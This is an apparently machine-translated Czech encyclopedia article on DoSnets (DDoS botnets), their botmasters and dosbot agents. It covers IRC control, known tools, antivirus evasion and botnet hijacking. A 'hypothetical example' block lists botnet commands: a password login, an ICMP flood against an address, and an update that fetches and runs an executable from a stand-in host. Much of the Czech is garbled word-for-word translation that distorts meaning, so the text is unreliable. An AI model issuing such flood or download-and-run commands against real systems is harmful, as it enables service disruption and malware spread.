DoSnet
DoSnet ( Denial of Service sítě ) je druh botnet / malware a většinou používán jako termín pro škodlivé botnetů, zatímco benevolentní botnetů často zjednodušeně označovány jako botnety. Dosnets se používají pro Distributed Denial of Service (DDoS) útoky, které mohou být velmi zničující.
Oni toulají se ve velikosti od několika roboty pár tisíc botů až na více než sto tisíc botů.
Mnoho dosbots používat IRC protokol, ale někteří používají své vlastní protokoly. Někteří mohou použít decentralizované P2P sítě. Je-li použit IRC, botmaster často UserMode + i (neviditelný) a kanál má režim často + psntk (soukromé, tajné, a potřebují heslo pro spojení). Někdy sítě je umístěn na veřejné IRC síti, zatímco schopnější botmasters hostit síť na soukromých serverech.
Pokročilejší dosnets používat technologie, jako jsou SSL připojení a kryptografie , aby se zabránilo paket čichání , kontrolu dat a analýzu.
Botmaster můžete použít roboty " paketů "(poslat ničivou záplavu dat) do jiných počítačů nebo sítí. On / ona může často také jim plnit různé další úkoly, jako je například dálkově načítání novou verzi bot softwaru a aktualizace sami.
Známá dosnet software obsahuje tfn2k , Stacheldraht , a Trinoo .
Existují dosnet lovci, kteří najdou dosnets a analyzovat roboty a / nebo síť, aby se jejich rozbití. Například zjištění přístup k botům a velící jim "odinstalovat" samy o sobě, pokud taková funkce je přítomen v bot softwaru, nebo "aktualizace" se na zmetek, nebo stáhnout a spustit nějaký čistič. Pokročilé roboty mohou použít kryptograficky podepsané aktualizace ujistěte se, že aktualizace je závazné.
Botmaster
Botmaster je osoba, která kontroluje tyto roboty / drony. On / ona obvykle připojuje k síti přes proxy , vyhazovači nebo mušle , aby zakryl IP adresu anonymity a používá heslo k ověření sám. Když roboty ověřili heslo (a případné další kritéria pro ověřování), které jsou pod velením botmaster je. Někdy botnet je sdílená, a více botmasters provozovat společně.
Botmaster může být zkušený černý klobouk hacker , nebo jen pouhý skript děťátko .
Někdy botmasters unést boty od dosnet jiného botmaster analýzou bot nebo síť, objevuje heslo, a velící roboty na "aktualizace" sami do svého vlastnictví.
Využití Hypotetický příklad
. Login my54kingdom78
. Icmpflood 192.0.2.123 3500
. Login my54kingdom78
. Aktualizace https://www.example.com/uploads/dosnet.exe
Dosbot
Dosbot (Denial of Service bot, také volal Distributed Denial of Service Agent) je klient, který se používá pro připojení k síti, a je také software, který provádí veškeré útoky. Spustitelný soubor je obvykle svlékl symbolů a komprimovány s nástroji (například UPX ) poplést obsah a aby se zabránilo reverzní inženýrství . Je to obvykle kódovány tak, aby automaticky spuštění při každém startu počítače (re), a je také naprogramován tak, aby skrýt sám. Ověření se obvykle provádí porovnáním dodaný heslo proti holého textu řetězec nebo kryptografické hash (jako MD5 nebo SHA-1 ), který může být osolené pro zvýšení bezpečnosti.
Někdy dosbots jsou instalovány spolu s rootkit , který má zabránit bot z detekce.
Často mohou provádět více než pouze z jednoho druhu útoku. Útoky jsou TCP , UDP , ICMP útoky. Pokročilé roboty mohou používat suroviny zásuvky a postavit vlastní pakety provádět SYN záplavy a další spoofing útoky.
Počítače infikované dosbot látkami jsou odkazoval se na jako " zombie ".
Drtivá většina z roboty jsou psány v C nebo C + + programovací jazyky.
Mnoho nových roboty jsou nyní infikuje lidi pomocí Java appletů , takže když člověk s Java povolen navštíví webovou stránku, bude bot spustit kód v Javě, a pak může vydávat příkazy pro připojení k DoSnet.
Příkazy pro robota mohou používat předponu, jako vykřičníkem, zavináče (@) nebo tečky.
To se může pokusit ukončit proces známého antivirového programu a antimalware software, aby se chránil. To může zakázat zabezpečení a aktualizace služeb.
To může kopírovat sám sebe do náhodně pojmenovaný soubor, nebo zamaskovat sám se jménem podobně jako systémové služby / procesu.
To se může pokusit odstranit konkurenční malware, aby se zabránilo systému od chová podezřele.
To může zkusit vypnout firewall nebo přidat pravidla k otevření určitých portů nebo povolit určité spojení.
To může zahrnovat anti-ladění funkce.